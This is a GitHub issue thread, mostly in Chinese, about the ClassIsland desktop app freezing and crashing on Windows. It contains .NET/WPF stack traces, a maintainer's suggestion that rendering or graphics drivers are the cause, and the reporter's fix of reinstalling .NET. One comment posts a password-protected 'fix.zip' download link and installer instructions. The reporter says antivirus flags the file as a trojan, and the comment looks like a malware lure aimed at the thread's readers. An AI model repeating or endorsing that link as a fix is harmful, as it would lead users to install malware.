### ISSUE TITLE
程序卡死

### ISSUE THREAD

**Issue by Qsgz2023ji5ban** [ClassIsland/ClassIsland#291]
### 检查清单

- [X] 我已更新到最新版 ![最新的版本号](https://img.shields.io/github/v/release/ClassIsland/ClassIsland?include_prereleases&style=flat-square&label=) 或 ![最新的版本号](https://img.shields.io/github/v/release/ClassIsland/ClassIsland?style=flat-square&label=) 测试，并看过[最新提交](https://github.com/ClassIsland/ClassIsland/commits/dev/)，确认这一 Bug 还没有修复。
- [X] 我已在 [Issues](https://github.com/ClassIsland/ClassIsland/issues?q=label%3ABug) 中检索，确认这一 Bug 未被提交过，并且在[常见问题](https://docs.classisland.tech/zh-cn/latest/app/faq/)中没有解决方案。
- [X] 我已知晓并同意，此处仅用于汇报程序中存在的问题（关于其他非程序本身的问题应当在 Discussion 板块提出）。

### 期望的行为

不崩溃。

### 实际结果

崩溃。没有主窗口。有托盘图标，但点击时没响应。怀疑是祖传 .net 问题
（噔 噔 咚.png）
![image](https://github.com/user-attachments/assets/acaf0815-fe60-48d2-830f-65109d13f883)

### 重现步骤

打开挂到后台。

### 堆栈跟踪（可选）

```shell
（看了一下，没啥用）
Application: ClassIsland.exe
CoreCLR Version: 8.0.824.36612
.NET Version: 8.0.8
Description: The process was terminated due to an unhandled exception.
Exception Info: System.ComponentModel.Win32Exception (0x80004005): 操作成功完成。
   at MS.Win32.HwndWrapper..ctor(Int32 classStyle, Int32 style, Int32 exStyle, Int32 x, Int32 y, Int32 width, Int32 height, String name, IntPtr parent, HwndWrapperHook[] hooks)
   at System.Windows.Interop.HwndSource.Initialize(HwndSourceParameters parameters)
   at System.Windows.Window.CreateSourceWindow(Boolean duringShow)
   at System.Windows.Window.ShowHelper(Object booleanBox)
   at System.Windows.Window.Show()
   at System.Windows.Window.ShowDialog()
   at ClassIsland.App.App_OnDispatcherUnhandledException(Object sender, DispatcherUnhandledExceptionEventArgs e) in D:\a\ClassIsland\ClassIsland\ClassIsland\App.xaml.cs:line 147
   at System.Windows.Threading.Dispatcher.CatchException(Exception e)
   at System.Windows.Threading.ExceptionWrapper.TryCatchWhen(Object source, Delegate callback, Object args, Int32 numArgs, Delegate catchHandler)
   at System.Windows.Threading.Dispatcher.LegacyInvokeImpl(DispatcherPriority priority, TimeSpan timeout, Delegate method, Object args, Int32 numArgs)
   at MS.Win32.HwndSubclass.SubclassWndProc(IntPtr hwnd, Int32 msg, IntPtr wParam, IntPtr lParam)
（要不然就是这样）
Category: ClassIsland.App
EventId: 0

发生严重错误。

Exception: 
System.Runtime.InteropServices.COMException (0x88980406): UCEERR_RENDERTHREADFAILURE (0x88980406)
   at System.Windows.Media.Composition.DUCE.Channel.SyncFlush()
   at System.Windows.Interop.HwndTarget.UpdateWindowSettings(Boolean enableRenderTarget, Nullable`1 channelSet)
   at System.Windows.Interop.HwndTarget.UpdateWindowPos(IntPtr lParam)
   at System.Windows.Interop.HwndTarget.HandleMessage(WindowMessage msg, IntPtr wparam, IntPtr lparam)
   at System.Windows.Threading.ExceptionWrapper.InternalRealCall(Delegate callback, Object args, Int32 numArgs)
   at System.Windows.Threading.ExceptionWrapper.TryCatchWhen(Object source, Delegate callback, Object args, Int32 numArgs, Delegate catchHandler)
```

### 应用版本

1.4.5.0-Griseo-d9c7e9c(HEAD) (Core 1.4.0.0)

### 操作系统版本

Microsoft Windows 10.0.22623

### 最后一步

- [X] 我认为上述的描述已经足以详细，以允许开发人员能复现该问题。如果我的 issue 没有按照上述的要求填写，可能会被无条件关闭。

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

@pilot5657 sir do you sure that this file doesn't have a virus? 
my hourong security told me this is Trojan/MSIL.Agent.li.

**Comment by HelloWRC** [comment]
目前考虑可能是渲染相关问题，可以试着升级下显卡驱动，或者关闭兼容透明模式试试。

<https://learn.microsoft.com/zh-cn/troubleshoot/developer/dotnet/framework/general/wpf-render-thread-failures>

**Comment by Qsgz2023ji5ban** [comment]
玄学问题，把 .net 卸载再安装就好了
